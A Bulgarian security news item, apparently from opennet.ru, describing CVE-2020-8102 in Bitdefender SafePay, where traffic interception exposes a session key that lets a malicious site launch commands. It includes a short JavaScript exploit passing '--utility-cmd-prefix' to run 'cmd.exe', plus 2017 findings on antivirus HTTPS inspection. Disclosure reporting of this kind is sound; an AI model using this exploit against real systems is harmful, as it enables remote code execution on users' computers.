Уязвимост в защитения браузър Bitdefender SafePay, водеща до изпълнение на код

Владимир Палант, създател на Adblock Plus, установи уязвимост (CVE-2020-8102) в специализирания уеб браузър Safepay, базиран на Chromium, предлаган в пакета за антивирусна защита Bitdefender Total Security 2020, насочен към подобряване на безопасността на потребителя в глобалната мрежа (например, предоставя се допълнителна изолация при достъп до банки и платежни системи). Уязвимостта позволява на отворените в браузъра сайтове да изпълняват произволен код на ниво операционна система.

Причината за проблема е, че антивирусът Bitdefender перехваща локално HTTPS трафика чрез подмяна на оригиналния TLS сертификат на сайта. На клиента се инсталира допълнителен коренов сертификат, който прикрива работата на използваната система за инспекция на трафика. Антивирусът се намесва в защитения трафик и влага собствен JavaScript код на определени страници, за да реализира функцията Safe Search, а при проблеми със сертификата на защитената връзка заменя показваната страница с грешка с своя. Като новата страница с грешка се показва от името на отваряния сървър, останалите страници на същия сървър имат пълен достъп до съдържанието, вмъкнато от Bitdefender.

При отваряне на контролирания от нападателя сайт, този сайт може да изпрати XMLHttpRequest и да симулира ответна грешка с HTTPS сертификата, което води до извеждане на страница с грешка, заменена от Bitdefender. Тъй като страницата с грешка е отворена в контекста на домейна на атакуващия, той може да прочете съдържанието на заменената страница с параметрите на Bitdefender. На заменената страница от Bitdefender се намира и сесионен ключ, позволяващ чрез вътрешното API на Bitdefender да стартира отделна сесия на браузъра Safepay, указвайки произволни флагове на командния ред, и да постигне изпълнението на произволни системни команди с флага "--utility-cmd-prefix". Пример за експлойт (param1 и param2 — стойности, получени от страницата с грешка):

var request = new XMLHttpRequest();
request.open("POST", Math.random());
request.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
request.setRequestHeader("BDNDSS_B67EA559F21B487F861FDA8A44F01C50", param1);
request.setRequestHeader("BDNDCA_BBACF84D61A04F9AA66019A14B035478", param2);
request.setRequestHeader("BDNDWB_5056E556833D49C1AF4085CB254FC242", "obk.run");
request.setRequestHeader("BDNDOK_4E961A95B7B44CBCA1907D3D3643370D", location.href);
request.send(«data:text/html,nada —utility-cmd-prefix=\»cmd.exe /k whoami & echo\»»);

Уязвимост в защитения браузър Bitdefender SafePay, водеща до изпълнение на код

Напомняме, че проведеното през 2017 година проучване показа, че 24 от 26 тествани антивирусни продукта, инспектиращи HTTPS трафик чрез подмяна на сертификати, намаляваха общото ниво на сигурност на HTTPS връзката.
Актуалните набори от криптографски алгоритми бяха предоставени само в 11 от 26 продукта. 5 системи не извършваха верификация на сертификатите (Kaspersky Internet Security 16 Mac, NOD32 AV 9, CYBERsitter, Net Nanny 7 Win, Net Nanny 7 Mac). Продуктите Kaspersky Internet Security и Total Security бяха подложени на атака CRIME, а продуктите AVG, Bitdefender и Bullguard на атаки Logjam и POODLE. Продуктът Dr.Web Antivirus 11 позволява да се върнете към ненадеждни експортни криптографски алгоритми (атака FREAK).

Източник: opennet.ru

Купете надежден хостинг за сайтове със защита от DDoS, VPS и VDS сървъри 🔥 Купете надежден хостинг за сайтове със защита от DDoS, VPS и VDS сървъри | ProHoster